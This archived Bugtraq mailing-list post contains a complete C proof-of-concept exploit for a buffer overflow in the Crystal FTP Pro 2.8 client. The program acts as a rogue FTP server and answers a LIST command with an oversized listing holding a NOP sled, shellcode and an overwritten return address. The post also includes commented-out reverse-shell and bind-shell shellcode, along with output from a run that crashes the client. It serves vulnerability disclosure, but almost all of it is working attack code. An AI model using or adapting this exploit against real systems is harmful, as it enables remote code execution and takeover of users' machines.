lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041224033911.13347.qmail@www.securityfocus.com>
Date: 24 Dec 2004 03:39:11 -0000
From: <cybertronic@....net>
To: bugtraq@...urityfocus.com
Subject: RE: Crystal FTP Pro 2.8 PoC




v0.2

ChangeLog:
-added 1 code, replaced bindcode & reversecode
-added way how to write to addr 0x0012f496
-removed register jumps

/*
12/23/2004
NOTES: -this piece of code is supposed to be PoC !
       -Target Buffer Size: 328-68-4 is about 254 bytes
       -RET Addr Space: 0x0012f496 to 0x0012f594

       Sending 327 bytes to the client will appen NULL byte to RET-ADDR
       thus allowing us to jmp to 0x0012f496 and exec arbitrary code.
       Insert some tiny shellcode instead of that POP-UP-107-BYTE-CODE !

       -Suggestions? Mail me! cybertronic@....net
        Greetz fly to my girlfriend YASMIN H.

                                                    ¼
                                                   ¼M
                   M                              ¼MMM
                   MMm                           ¼MMMM
                   M$$MMm                       ¼MMMMM.
                   MM$$MMMMm                   MMMMMMMM
                   `MM$$MMMMMMm               4MMMM$$MM
                    MMM$$MMMMMMMMm           ´MMMM$$MMM
                     MMM$$$MMMMMMMMm         mMMMM$MMMM
                      `MMM$$$MMMMMMMm        MMMM$MMMM´
                        MMMM$$$MMMMMMMm      MMM$$MMM´
                         `MMMMMMMMMMMMMm     MMMMMMM´
                           `MMMMMMMMMMMMMm   MMMMMM
                              `MMMMMMMMMMMM  MMMMM
                                 `MMMMMMMMMM MMMMM
                                    `MMMMMMMMMMMM
                                      MMMMMMMMMMM
                               mmMMMMMMMMMMMMMMMMM
                           mmMMMMMMMMMMMMMMMMMMMMMM
                          ¼MMM#MMMMMMMMMMMMMMMMMMMMm
                        4MMM<º >MMMMMMMMMMMMMMMMMMMM
                       MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
                      4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                        MMMMMMMMMMMMMMMMMMMMMMMMMMMM
       ¼Mn               ¼MMMMMMMMMMMMMMMMMMMMMMMMM            ¼Mnn
       nM                  `MMMMMMMMMMMMMMMMMMMMMM´              n¼
        `¼                    MMMMMMMMMMMMMMMMM¼                n´
                                     MMMMMM¼
                                    mtr¼


     mMMM           nmM                         mM
   mM¼´  M          ' M                          n
 mM$                 nM                       n¼MMn¼Ä
4M               m   ¼M                      N   ¼                           ¼`
m¼       `n¼    mM  NM´                         NM
mM        mMm  nm   M´¼Mļ     n¼Mm   ¼n  xnÄ,  ¼   ¼n  xnÄ  ¼Mm   Mn n¼     nM   nMm
 mM        `mMM´   nM     M   nM  ,`   ¼n´  y   M    ¼n´  y nM  ¼   nM  Ä    Ä   ¼
  M¼         M'    ¼Ä      M  n.,´     nm      nM    nM     n   M   ¼   Ä    ¼  n
   MM¼  mM   M    nM Ä    M´  n    ,  nM       ¼Ä   nM      M  nM   M   M   M´  M   n
     MMM¼   M´   nM   MÄÄM     n¼nN  ¼M       nM   ¼M       `¼M´   ´¼  .N  nM    ¼nM´
           M´
         n´                                              cybertronic 2oo5
        ´                                        ________________
                                                    ----------------------/



                MMMMMMMMm                            mMMMMMMM¼
             ´MM$MMMMMMMMMm                        mMMMMMMMMM$MM`
             MMMMMMMMMMMMMMMm                    mMMMMMMMMMMMMMMM
             MMMMMMMMMMMMMMMMMM                MMMMMMMMMMMMMMMMMM
             MMMMMMMMMMMMMMMMMMMM            MMMMMMMMMMMMMMMMMMMM
               `MMMMMMMMMMMMMMMMMM          MMMMMMMMMMM(c)MMMM´

                ºÕÍÄúú  just want to say love you dad!  úúÄÍÕº

---snip---

cybertronic@...onic:~/poc> gcc -o crystal_expl crystal_expl.c
cybertronic@...onic:~/poc> ./crystal_expl 192.168.2.101

### # # ###  ### ###  ### ###  ### #   # # ###
#   # # #  # #   #  #  #  #  # # # ##  # # #
#   # # ###  ### ###   #  ###  # # # # # # #
#    #  #  # #   # #   #  # #  # # #  ## # #
###  #  ###  ### #  #  #  #  # ### #   # # ###
                cybertronic@....net
                  ----------(c) 2005----------

Crystal FTP Pro v2.8 PoC

[*] Creating socket...OK!
[*] Listening...OK!
[*] Local IP: 192.168.2.101
[*] Incomming connection from:   192.168.2.102
[*] Sending Welcome Message...OK!
[*] Getting Login Information
--> Reading USER...OK!
--> Reading PASS...OK!
    USER LOGGED IN!
[*] Proceeding...
--> Reading cmd...OK!
--> Reading cmd...OK!
--> Reading cmd...OK!
[*] Entering Passive Mode...
[*] Creating socket...OK!
[*] Listening...OK!
[*] Passive connection established!
--> Reading cmd...OK!
[*] User is trying to use "LIST" command
[*] Creating bad packet...OK!
[*] Sending bad packet [328 bytes]...OK!
[*] Confirming...OK!
--> Reading cmd...FAILED! [client crashed]

cybertronic@...onic:~/poc>

---snip---

*/

#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>

#define RED	"\E[31m\E[1m"
#define GREEN	"\E[32m\E[1m"
#define YELLOW	"\E[33m\E[1m"
#define BLUE	"\E[34m\E[1m"
#define NORMAL	"\E[m"

#define PORT 1337
#define PASV 31337
#define BACKLOG 5

/*
//335 bytes
unsigned char reverseshell[] =
"\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa"
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2"
"\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e"
"\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64"
"\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57"
"\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a"
"\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8"
"\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90"
"\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57"
"\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68\xc0\xa8\x00\xf7\x68\x02"
"\x00\x22\x11\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44"
"\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe"
"\x44\x24\x3d\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d"
"\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00"
"\x51\xff\x55\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24"
"\x57\xff\x55\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b"
"\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb"
"\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0"
"\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b"
"\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b"
"\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

//356 bytes
unsigned char bindshell[] =
"\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86"
"\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc"
"\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\xce\x72\xfe\xb3"
"\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89"
"\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59"
"\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06"
"\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e"
"\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff"
"\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31"
"\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55"
"\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81"
"\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6"
"\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff"
"\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
"\x5b\xc2\x08\x00";
*/

//107 bytes [ Addresses WinXP Pro SP2 ]
char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"
"\x77\x1d\x80\x7c" //LoadLibraryA kernel32.dll
"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
"\x28\xac\x80\x7c" //GetProcAddress kernel32.dll
"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51\x51"
"\x52\xff\xd0\x31\xd2\x50\xb8"
"\xa2\xca\x81\x7c" //ExitProcess kernel32.dll
"\xff\xd0\xe8\xc4\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64"
"\x6c\x6c\x4e\xe8\xc2\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65"
"\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff\xff\x48\x65\x79\x4e";

void auth ( int s );
void header ();
void handle_cmd ( int s, int connfd, char* ip );
char* get_cmd ( int s );
int isip ( char* ip );

int
main ( int argc, char* argv[] )
{
	int listenfd, connfd;
	char* ip;
	pid_t childpid;
	socklen_t clilen;
	struct sockaddr_in cliaddr, servaddr;

	if ( argc != 2 )
	{
		printf ( RED "[!] Usage: %s LOCAL_IP\n" NORMAL, argv[0] );
		exit ( 1 );
	}
	if ( isip ( argv[1] ) != 0 )
	{
		printf ( RED "[!] Enter Valid IP\n" NORMAL );
		exit ( 1 );
	}
	system ( "clear" );
	header ();
	printf ( "[*] Creating socket..." );
	if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
	{
        	printf ( RED "FAILED!\n" NORMAL );
        	exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL );
	bzero ( &servaddr, sizeof ( servaddr ) );
	servaddr.sin_family = AF_INET;
	servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
	servaddr.sin_port = htons ( PORT );

	bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
	printf ( "[*] Listening..." );
	if ( listen ( listenfd, BACKLOG ) == -1 )
	{
		printf ( RED "FAILED!\n" NORMAL );
		exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL );

	for ( ; ; )
	{
		clilen = sizeof ( cliaddr );

		if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
		{
			close ( listenfd );
			printf ( RED "FAILED!\n" NORMAL );
			exit ( 1 );
		}

		if ( ( childpid = fork ( ) ) == 0 )
		{
			close ( listenfd );
			ip = ( char* ) ( argv[1] );
			printf ( "[*] Local IP: %s\n", ip );
			printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
			auth ( connfd );
			handle_cmd ( connfd, ( int ) NULL, ip );
		}
		close ( connfd );
	}
}

int
isip ( char* ip )
{
	unsigned int a, b, c, d;

	sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d );
	if ( a < 1 || a > 255 )
		return ( 1 );
	if ( b < 0 || b > 255 )
		return ( 1 );
	if ( c < 0 || c > 255 )
		return ( 1 );
	if ( d < 0 || d > 255 )
		return ( 1 );
	return ( 0 );
}

void
auth ( int s )
{
	char user[32], pass[32], out[128];

	printf ( "[*] Sending Welcome Message..." );
	bzero ( &out, 128 );
	strcpy ( out, "220 cybertronicFTP v0.2\r\n" );
	if ( write ( s, out, strlen ( out ) ) <= 0 )
	{
		printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
		exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL );
	printf ( "[*] Getting Login Information\n" );
	printf ( YELLOW "--> Reading USER..." NORMAL );
	sleep ( 1 );
	if ( read ( s, user, 32 ) <= 0 )
	{
		printf ( RED "FAILED\n" NORMAL );
		exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL );
	sleep ( 1 );
	bzero ( &out, 128 );
	strcpy ( out, "331 Anonymous FTP server, send password though.\r\n" );
	if ( write ( s, out, strlen ( out ) ) <= 0 )
	{
		printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
		exit ( 1 );
	}
	printf ( YELLOW "--> Reading PASS..." NORMAL );
	sleep ( 1 );
	if ( read ( s, pass, 32 ) <= 0 )
	{
		printf ( RED "FAILED\n" NORMAL );
		exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL );
	sleep ( 1 );
	bzero ( &out, 128 );
	strcpy ( out, "230 Login successful!\r\n" );
	if ( write ( s, out, strlen ( out ) ) <= 0 )
	{
		printf ( RED "\t!!! ERROR: AUTHORIZATION FAILED !!!\n" NORMAL );
		exit ( 1 );
	}
	printf ( GREEN "    USER LOGGED IN!\n" NORMAL );
	printf ( "[*] Proceeding...\n" );
}

void
handle_cmd ( int s, int s2, char* ip )
{

	int listenfd, connfd;
	int i = 1;
	int tmp[4];
	char* a = NULL;
	pid_t childpid;
	socklen_t clilen;
	struct sockaddr_in cliaddr, servaddr;
	char out[128], evil[512], addr[32];
	char* cmd;;
	unsigned long offset1 = 0xdeadc0de;
	unsigned long offset2 = 0x12f504de;

	while ( 1 )
	{
		cmd = get_cmd ( s );
		if ( strncmp ( cmd, "PWD", 3 ) == 0 )
		{
			bzero ( &out, 128 );
			strcpy ( out, "257 \"/\" is current directory.\r\n" );
			if ( write ( s, out, strlen ( out ) ) <= 0 )
			{
				printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
				exit ( 1 );
			}
		}
		else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
		{
			bzero ( &out, 128 );
			strcpy ( out, "257 \"/\" is current directory.\r\n" );
			if ( write ( s, out, strlen ( out ) ) <= 0 )
			{
				printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
				exit ( 1 );
			}
		}
		else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
		{
			bzero ( &out, 128 );
			strcpy ( out, "200 Type set to A..\r\n" );
			if ( write ( s, out, strlen ( out ) ) <= 0 )
			{
				printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
				exit ( 1 );
			}
		}
		else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
		{
			bzero ( &addr, 32 );
			a = (char*)strtok ( ip, "." );
			tmp[0] = (int)a;
			while ( a != NULL)
			{
				a = (char*)strtok ( NULL, "." );
				tmp[i] = (int)a;
				i++;
			}
			bzero ( &out, 128 );
			sprintf( out, "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).\r\n", tmp[0], tmp[1], tmp[2], tmp[3] );
			if ( write ( s, out, strlen ( out ) ) <= 0 )
			{
				printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
				exit ( 1 );
			}
			printf ( "[*] Entering Passive Mode...\n" );
			printf ( "[*] Creating socket..." );
			if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
			{
        			printf ( RED "FAILED!\n" NORMAL );
        			exit ( 1 );
			}
			printf ( GREEN "OK!\n" NORMAL );
			bzero ( &servaddr, sizeof ( servaddr ) );
			servaddr.sin_family = AF_INET;
			servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
			servaddr.sin_port = htons ( PASV );

			bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
			printf ( "[*] Listening..." );
			if ( listen ( listenfd, 1 ) == -1 )
			{
				printf ( RED "FAILED!\n" NORMAL );
				exit ( 1 );
			}
			printf ( GREEN "OK!\n" NORMAL );
			clilen = sizeof ( cliaddr );

			if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
			{
				close ( listenfd );
				printf ( RED "FAILED!\n" NORMAL );
				exit ( 1 );
			}
			close ( listenfd );
			printf ( "[*]" GREEN " Passive connection established!\n" );
			handle_cmd ( s, connfd, addr );
		}
		else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
		{
			printf ( "[*]" GREEN " User is trying to use \"LIST\" command\n" NORMAL );
			printf ( "[*] Creating bad packet..." );
			//this will overwrite EIP with 0xdeadc0de
			//bzero ( &evil, 512 );
			//strcpy ( evil, "-rw-r--r--                              29 Dec 22 13:37 cybertronic." );
			//memset ( evil+68, 'A', 254 );
			//strncat ( evil, ( unsigned char * ) &offset1, 4 );
			//strcat ( evil, "\r\n" );
			bzero ( &evil, 512 );
			strcpy ( evil, "-rw-r--r--                              29 Dec 22 13:37 cybertronic." );
			memset ( evil+68, 0x90, 146 );
			strcat ( evil, code );
			strncat ( evil, ( unsigned char * ) &offset2, 4 );
			strcat ( evil, "\r\n" );
			printf ( GREEN "OK!\n" NORMAL );
			bzero ( &out, 128 );
			strcpy ( out, "150 Here comes the directory listing.\r\n" );
			if ( write ( s, out, strlen ( out ) ) <= 0 )
			{
				printf ( RED "FAILED!" NORMAL);
				exit ( 1 );
			}
			printf ( "[*] Sending bad packet [%i bytes]...", strlen ( evil ) );
			if ( write ( s2, evil, strlen ( evil ) ) <= 0 )
			{
				printf ( RED "FAILED!" NORMAL);
				exit ( 1 );
			}
			printf ( GREEN "OK!\n" NORMAL);
			bzero ( &out, 128 );
			strcpy ( out, "226 Transfer ok\r\n" );
			printf ( "[*] Confirming..." );
			if ( write ( s, out, strlen ( out ) ) <= 0 )
			{
				printf ( RED "FAILED!" NORMAL);
				exit ( 1 );
			}
			printf ( GREEN "OK!\n" NORMAL);
			close ( s2 );
		}
		else
		{
			bzero ( &out, 128 );
			strcpy ( out, "550 UNKNOWN COMMAND\r\n" );
			if ( write ( s, out, strlen ( out ) ) <= 0 )
			{
				printf ( RED "!!! ERROR: COMMAND HANDLING FAILED !!!\n" NORMAL );
				exit ( 1 );
			}
		}
	}
}

char*
get_cmd ( int s )
{
	static char cmd[32];
	printf ( YELLOW "--> Reading cmd..." NORMAL );
	if ( read ( s, cmd, 32 ) <= 0 )
	{
		printf ( RED "FAILED! [client crashed]\n" NORMAL);
		exit ( 1 );
	}
	printf ( GREEN "OK!\n" NORMAL );
	return ( cmd );
}

void
header ()
{
	system ( "clear" );
	printf ( RED "### " GREEN "# # " YELLOW "###  " BLUE "### " RED "###  " GREEN "### " YELLOW "###  " BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" NORMAL);
	printf ( RED "#   " GREEN "# # " YELLOW "#  # " BLUE "#   " RED "#  # " GREEN " #  " YELLOW "#  # " BLUE "# # " RED "##  # " GREEN "# " YELLOW "#  \n" NORMAL);
	printf ( RED "#   " GREEN "# # " YELLOW "###  " BLUE "### " RED "###  " GREEN " #  " YELLOW "###  " BLUE "# # " RED "# # # " GREEN "# " YELLOW "#  \n" NORMAL);
	printf ( RED "#   " GREEN " #  " YELLOW "#  # " BLUE "#   " RED "# #  " GREEN " #  " YELLOW "# #  " BLUE "# # " RED "#  ## " GREEN "# " YELLOW "#  \n" NORMAL);
	printf ( RED "### " GREEN " #  " YELLOW "###  " BLUE "### " RED "#  # " GREEN " #  " YELLOW "#  # " BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" NORMAL);
	printf ( RED "                cybertronic@....net\n" NORMAL );
	printf ( RED "                  ----------(c) 2005----------\n\n" NORMAL );
	printf ( "Crystal FTP Pro v2.8 PoC\n\n" );
}



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ